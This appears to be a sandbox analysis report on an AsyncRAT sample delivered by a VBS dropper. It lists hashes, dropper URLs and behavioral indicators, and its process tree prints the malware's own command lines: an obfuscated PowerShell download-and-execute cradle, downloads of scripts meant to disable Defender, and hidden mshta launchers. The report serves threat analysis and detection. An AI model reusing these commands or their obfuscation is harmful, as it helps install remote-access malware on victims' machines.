asyncrat | a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61

Analysis

max time kernel
150s
max time network
151s
platform
windows10_x64
resource
win10v20210408
submitted
02-05-2021 05:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DX35.vbs
Size

978B
MD5

bcbad24347e93a0508784f3b4301b7eb
SHA1

e53eebe440a13db0d356aba83a7e7163dcb5b09f
SHA256

a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61
SHA512

3bfd946bcd9a06d15bb69a938865763d35dde92992d4cfb9b5065e5397803bf486eb57f2bdd83d59badea7afbddc45ce0920f139fe11107688e2bb781ce4a98b

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://nyc002.hawkhost.com/~mazenne1/ITR/ls.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/NDef/11.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/NDef/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/NDef/DefenderKill.lnk

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/NDef/Kill.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/904-257-0x000000000040D0CE-mapping.dmp	asyncrat
behavioral2/memory/3292-258-0x000000000040D0CE-mapping.dmp	asyncrat

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
9	1004	powershell.exe
18	3884	powershell.exe
19	4516	powershell.exe
20	4768	powershell.exe
21	2928	powershell.exe
22	2260	powershell.exe
23	4828	powershell.exe
24	1672	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 4476 set thread context of 904	4476	powershell.exe	MSBuild.exe
PID 4476 set thread context of 3292	4476	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
3884	powershell.exe
3884	powershell.exe
3884	powershell.exe
4516	powershell.exe
4516	powershell.exe
4516	powershell.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe
4828	powershell.exe
4828	powershell.exe
4828	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedw20.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeIncreaseQuotaPrivilege	3204	powershell.exe
Token: SeSecurityPrivilege	3204	powershell.exe
Token: SeTakeOwnershipPrivilege	3204	powershell.exe
Token: SeLoadDriverPrivilege	3204	powershell.exe
Token: SeSystemProfilePrivilege	3204	powershell.exe
Token: SeSystemtimePrivilege	3204	powershell.exe
Token: SeProfSingleProcessPrivilege	3204	powershell.exe
Token: SeIncBasePriorityPrivilege	3204	powershell.exe
Token: SeCreatePagefilePrivilege	3204	powershell.exe
Token: SeBackupPrivilege	3204	powershell.exe
Token: SeRestorePrivilege	3204	powershell.exe
Token: SeShutdownPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeSystemEnvironmentPrivilege	3204	powershell.exe
Token: SeRemoteShutdownPrivilege	3204	powershell.exe
Token: SeUndockPrivilege	3204	powershell.exe
Token: SeManageVolumePrivilege	3204	powershell.exe
Token: 33	3204	powershell.exe
Token: 34	3204	powershell.exe
Token: 35	3204	powershell.exe
Token: 36	3204	powershell.exe
Token: SeIncreaseQuotaPrivilege	3204	powershell.exe
Token: SeSecurityPrivilege	3204	powershell.exe
Token: SeTakeOwnershipPrivilege	3204	powershell.exe
Token: SeLoadDriverPrivilege	3204	powershell.exe
Token: SeSystemProfilePrivilege	3204	powershell.exe
Token: SeSystemtimePrivilege	3204	powershell.exe
Token: SeProfSingleProcessPrivilege	3204	powershell.exe
Token: SeIncBasePriorityPrivilege	3204	powershell.exe
Token: SeCreatePagefilePrivilege	3204	powershell.exe
Token: SeBackupPrivilege	3204	powershell.exe
Token: SeRestorePrivilege	3204	powershell.exe
Token: SeShutdownPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeSystemEnvironmentPrivilege	3204	powershell.exe
Token: SeRemoteShutdownPrivilege	3204	powershell.exe
Token: SeUndockPrivilege	3204	powershell.exe
Token: SeManageVolumePrivilege	3204	powershell.exe
Token: 33	3204	powershell.exe
Token: 34	3204	powershell.exe
Token: 35	3204	powershell.exe
Token: 36	3204	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeRestorePrivilege	2076	dw20.exe
Token: SeBackupPrivilege	2076	dw20.exe
Token: SeDebugPrivilege	904	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exeWScript.exepowershell.exepowershell.execmd.exemshta.execmd.exemshta.exepowershell.execmd.exemshta.exepowershell.exe

description	pid	process	target process
PID 4804 wrote to memory of 1004	4804	WScript.exe	powershell.exe
PID 4804 wrote to memory of 1004	4804	WScript.exe	powershell.exe
PID 1004 wrote to memory of 1820	1004	powershell.exe	WScript.exe
PID 1004 wrote to memory of 1820	1004	powershell.exe	WScript.exe
PID 1820 wrote to memory of 2292	1820	WScript.exe	powershell.exe
PID 1820 wrote to memory of 2292	1820	WScript.exe	powershell.exe
PID 2292 wrote to memory of 3884	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 3884	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 4516	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 4516	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 4768	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 4768	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 2928	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 2928	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 1124	2292	powershell.exe	powershell.exe
PID 2292 wrote to memory of 1124	2292	powershell.exe	powershell.exe
PID 1124 wrote to memory of 5100	1124	powershell.exe	cmd.exe
PID 1124 wrote to memory of 5100	1124	powershell.exe	cmd.exe
PID 5100 wrote to memory of 2872	5100	cmd.exe	mshta.exe
PID 5100 wrote to memory of 2872	5100	cmd.exe	mshta.exe
PID 2872 wrote to memory of 3204	2872	mshta.exe	powershell.exe
PID 2872 wrote to memory of 3204	2872	mshta.exe	powershell.exe
PID 1004 wrote to memory of 2260	1004	powershell.exe	powershell.exe
PID 1004 wrote to memory of 2260	1004	powershell.exe	powershell.exe
PID 1004 wrote to memory of 4828	1004	powershell.exe	powershell.exe
PID 1004 wrote to memory of 4828	1004	powershell.exe	powershell.exe
PID 1004 wrote to memory of 1672	1004	powershell.exe	powershell.exe
PID 1004 wrote to memory of 1672	1004	powershell.exe	powershell.exe
PID 1004 wrote to memory of 3496	1004	powershell.exe	cmd.exe
PID 1004 wrote to memory of 3496	1004	powershell.exe	cmd.exe
PID 3496 wrote to memory of 2808	3496	cmd.exe	mshta.exe
PID 3496 wrote to memory of 2808	3496	cmd.exe	mshta.exe
PID 2808 wrote to memory of 4476	2808	mshta.exe	powershell.exe
PID 2808 wrote to memory of 4476	2808	mshta.exe	powershell.exe
PID 4476 wrote to memory of 4608	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4608	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4608	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4508	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4508	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4508	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4600	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4600	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4600	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4616	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4616	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 4616	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 968	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 968	4476	powershell.exe	MSBuild.exe
PID 4476 wrote to memory of 968	4476	powershell.exe	MSBuild.exe
PID 1004 wrote to memory of 4748	1004	powershell.exe	cmd.exe
PID 1004 wrote to memory of 4748	1004	powershell.exe	cmd.exe
PID 4748 wrote to memory of 4744	4748	cmd.exe	mshta.exe
PID 4748 wrote to memory of 4744	4748	cmd.exe	mshta.exe
PID 4744 wrote to memory of 3696	4744	mshta.exe	powershell.exe
PID 4744 wrote to memory of 3696	4744	mshta.exe	powershell.exe
PID 3696 wrote to memory of 2148	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 2148	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 2148	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 3984	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 3984	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 3984	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 3988	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 3988	3696	powershell.exe	MSBuild.exe
PID 3696 wrote to memory of 3988	3696	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DX35.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).INVOKE((('https://nyc002.hawkhost.com/~mazenne1/ITR/ls.txt'))))
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/NDef/11.ps1', 'C:\Users\Public\11.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/NDef/Defender.bat', 'C:\Users\Public\Defender.bat') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/NDef/DefenderKill.lnk', 'C:\Users\Public\DefenderKill.lnk') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/NDef/Kill.ps1', 'C:\Users\Public\Kill.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Kill.ps1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'"", 0:close")
7⤵
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:4608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:4508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:4600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:4616

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
6⤵
PID:3320

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
6⤵
PID:3292

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 700
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:2148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:3984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:3988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:4888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:5096

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
MD5
ce592d7b323596c62e25c58305fbd1f1

SHA1
a582b2c867d054bfc436ac04aa8b626a6e7c886b

SHA256
8cf9b48967283e8d15012c6f9438280841bb94baf499a91647922f28eab37619

SHA512
0b5640a2261fbb5bcdb60dee6b6178b2c451cce411d8b8791c8d6dc09e1b01a0e80d605a6e4e119453f349e4ee62340e9a3bed70dadb16a8b2fd4592facd3335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6f626481c9c146cbe83c682d983a4a04

SHA1
c3b29cb8f0f6e41f1407fdbbcf445fcc8a18e978

SHA256
3aa8dbe2a6d721fdfead4d99b9408028a3f7511a6168efaab936bd22d20abeba

SHA512
3c7f7eedaea9c985a8bc4d36bbdc2e03c1a5c597ef16cf3bed69b2f098e8ab7c7400a65415e566eeae1ad8bd0d36352bc0ddbae523201d669ca79c63d4aea336

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
53697ac5a9f706fb87d7c3b66a647d6b

SHA1
09fe0a9c0911aa5f051e9879db99f791703b5a2c

SHA256
967b3ad7cf76a3b5de187a9111d50960e4e581b247fe893a5ab48d251da862da

SHA512
7b481a0f3f5ffa7ecb78292c9e5583303ea30c76f109891453cdfa5c0f0a2e82306926091f6e645a86699222cac1753d90911ff9403e6f35e93c5e43b2a90b3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
986caf7ce75cf188d49b5fb865ca6348

SHA1
12aa188ab9d1b7c34861dad2bd4fd1f8af1a76bf

SHA256
f1039199d926598254e4942f1776357227ac9a64c8baa2ab00b160a0ef4296cc

SHA512
269480fd5a710a3d3ed9056dd4c26f4deea00b126815d7acaa431cc5082e2961a06dadf9cbe8fabc86bda1c6997d8a79fbf363d37a27611606e8d041656c2b86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
913a1d3878334beac15a339402d61770

SHA1
5c585c4acb797560efc6a87e9459f1d185faca79

SHA256
11ed197e4213dc7d6ae0c1cc8f7b855c463cd12df3a5d1d18e60a9e012f95ce6

SHA512
e08b7c6d4c559ac4bc2a28579572d348d9271c27363eea64f3c2dffd69c76f4ec493f1217842e5dc065ae7103f920010d85584138799902ab14bf4e3768954cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4630d97113688c7b47e9e9d2cd77603b

SHA1
a3008dc31ab011b2b7e8f50619e23b2b4162a816

SHA256
469b7bf90b0b8ef65473eff91021853740f2897e6cb9d6fb20c502339ebe9c77

SHA512
4db15f746e585e684e6eee30be221989303d16578e63210e777ac7c723f4b38502860dc038a3fed7b224e192936cfaad4ce8e4d00202b348c250d1908e125954

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4630d97113688c7b47e9e9d2cd77603b

SHA1
a3008dc31ab011b2b7e8f50619e23b2b4162a816

SHA256
469b7bf90b0b8ef65473eff91021853740f2897e6cb9d6fb20c502339ebe9c77

SHA512
4db15f746e585e684e6eee30be221989303d16578e63210e777ac7c723f4b38502860dc038a3fed7b224e192936cfaad4ce8e4d00202b348c250d1908e125954

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
26adc5c09d9d611bb20efd7ea3d4fd18

SHA1
1f520a1526e3c9aff408e9661ed90000284f4385

SHA256
129f5fd05038e2a9ebf149510b0d12e9c7e64a4f34af400db642b43162f881d7

SHA512
e7a6ee5a46c5657282fec41236cd8c54db6d15ae7debe7b8f82aa3940c2e0860a4b6abe12f446ee7d37542d0b9889838f61d81bf52d9d7f75a6f8b2c07a2df1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c69b098951db9d54204cd2c7d9347ba8

SHA1
56b51c9870e08828334133fd4589fd01c491a5e5

SHA256
babee4bcb79f0351a9e64bb215c700cfba78f435d40a326e9fc11cac286f6d31

SHA512
155d531929856ed84d372167caebf4d365514d8833eae45125cbfe6bd63b9f6bf0e5eca81b640bccf571364be80e57801d01879ff53acef093bf4641975b8528

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c90ff8db00bc0fbdf491c24a67d98d6e

SHA1
36fa378066837c86e41b2753f14e297b3d99ebd5

SHA256
81f254ab60d1b8eb12ef7237bb5144aa510b4cff8f65e5eedb43cdc715c3ef7b

SHA512
d8581416a50b487ed1a5fd3f00cb7343d6bd9071f192f43b4df200671ed356ffa2b9f93d25a58582bd48ce22c935e1e131ce58d9a3c531331f562de1861ca840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c99e5cc086cd76e1a7f6a39f9971c157

SHA1
c7a49e973c4ee8ba808b43595911f7a09300ae2e

SHA256
cbfd837d22729b48c6ddc430c8f85983c2558854634bfb17588defb3ea6e26f8

SHA512
1e8cf5535da9a247c8ce4010b25fb555e1ebba3466faab62726941f455b0c7393255cf87bb330efc1160bcdb5b343a469c2ab603b27ca5c9b997117b8366ccb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8afbd4894ed34c43de0204a3e2ee9fbe

SHA1
f80a60bac913a71091900d429795d68fcfef923d

SHA256
b6199129c82d4c5e032bc753d42aab1714256cdc47f3950ff7f5ac68830c35d3

SHA512
c671e313193beb811d23d6e35cf7768a84fab4d536f589f1de49be973be7469f3e24a33d7d17d31abdae5c09acfa0e660d6336e7d3edb7add9148097d0e86e4d

Download Submit
C:\Users\Public\11.ps1
MD5
5e46273d98225c5a858a87f3182ebc57

SHA1
0b8d35d1bba2b71cf357f359ee9b9c5d2f9740c3

SHA256
d226df24b30e6c51b0034d9a46f58b775c0179c9c54ac9a3aa0ad962774f0cf5

SHA512
601904e05626d919e473876c26566ce86409e5bb483e99387ee91090488f683f8b53f7aa2b78f3ab9303d574208dab415cadf64511c659fbc14dafa152efdd91

Download Submit
C:\Users\Public\11.ps1
MD5
f9671f50a3701099915249be9c9b519e

SHA1
c383a79653700507edf01c494f2a7ac664963711

SHA256
987b88896b23da2d57371bf1709019bee218ee72fb9a88f9afda88427570c448

SHA512
d21f67cee9d3fe56541beaab90c28335f9122abb1942a209ba6634f5f14fa75f8d43a3e0c4a11d2009a964200d06836df8245264c0922b8c46adff68d2293a41

Download Submit
C:\Users\Public\Defender.bat
MD5
bb81dd50c01d78e9359b7d8f2b99f93e

SHA1
35ecd940870508d659866d43351ebd11920b98b8

SHA256
fa94673156394c814fdab9b634ad6e327cc7e0f6cf5412f31d74103a3a6e3931

SHA512
3c29815e29a65e14f0202ddd9c83eda367535651f87332be39acfe2d0c51536cc224281b7c794f1b67a3528c293fdf76a7142b5d1c1c734ab35c664fa657f90f

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
